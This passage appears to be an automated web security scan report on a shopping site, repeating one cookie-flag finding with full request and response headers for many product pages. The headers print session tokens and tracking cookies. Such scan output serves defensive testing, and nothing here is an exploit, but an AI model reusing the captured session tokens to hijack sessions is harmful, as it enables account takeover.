<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>F ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fubu-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:21 GMT Server: Apache Set-Cookie: JSESSIONID=5D49821C1CDECFD3E5BD325EC569D258; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>F ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gold-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:54 GMT Server: Apache Set-Cookie: JSESSIONID=7A50A7A318FF5A4A894AA6FAB638F77D; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>G ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /green-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:28 GMT Server: Apache Set-Cookie: JSESSIONID=1F2215458ACD22B5FFCE6F03BC0F36ED; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>G ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /grey-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:56 GMT Server: Apache Set-Cookie: JSESSIONID=7254836A34E63C9EC2600D46E59272A7; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>G ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /handbags.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:02:57 GMT Server: Apache Set-Cookie: JSESSIONID=0FA8DC7E0DE1FF207F219A40A347D923; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>H ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /handpainted-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:19 GMT Server: Apache Set-Cookie: JSESSIONID=CE04DDC1D6280E6DEDB6C536E6722EB9; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>H ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /houndstooth-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:19 GMT Server: Apache Set-Cookie: JSESSIONID=8CE9F5733EA8D073965DBF72EF0416FF; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>H ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hugo-boss-baxter-belt/195604 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:23 GMT Server: Apache Set-Cookie: JSESSIONID=378BF103DD216EBA567C81A5BF37ED31; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hugo ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hugo-boss-baxter-belt/195604/436031 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:23 GMT Server: Apache Set-Cookie: JSESSIONID=3C0F6224C36A59AE3950A6AFC6615D9E; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hugo ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hugo-boss-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:22 GMT Server: Apache Set-Cookie: JSESSIONID=6728BDE6431918BCF0739D0EFB6C9294; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>H ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hugo-boss-benson-belt/195607 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:24 GMT Server: Apache Set-Cookie: JSESSIONID=C85B6D7C67648A1E0EEF8B24CCF11DD9; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hugo ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hugo-boss-benson-belt/195607/436036 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:23 GMT Server: Apache Set-Cookie: JSESSIONID=FE1778B527989ECBC2AD3048A48CBEF6; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hugo ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hugo-boss-bud-belt/195605 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:23 GMT Server: Apache Set-Cookie: JSESSIONID=15E331CC2D3DFA9ADB8CCD6E294F9C69; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hugo ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hugo-boss-bud-belt/195605/436033 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:23 GMT Server: Apache Set-Cookie: JSESSIONID=864F393E90E84A8D34E2F958096DD17A; Path=/ Edge-control: !no-store,max-age=14400 pagetype: detail Connection: close Content-Type: text/html;charset=ISO-8859-1 X-Pad: avoid browser bug
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hugo ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /imported-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:55 GMT Server: Apache Set-Cookie: JSESSIONID=46D6457BDFEBFF3F78B5597711BF31AA; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>I ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /india-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:56 GMT Server: Apache Set-Cookie: JSESSIONID=045B86F531B3AFB97C2013588BAB466D; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>I ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/about HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:00:42 GMT Server: Apache Set-Cookie: JSESSIONID=F6E637703B56B3219A8370533F5E6E03; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/affiliates HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:00:46 GMT Server: Apache Set-Cookie: JSESSIONID=0984125AA390868A3EAC4421066A519D; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/benefits HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
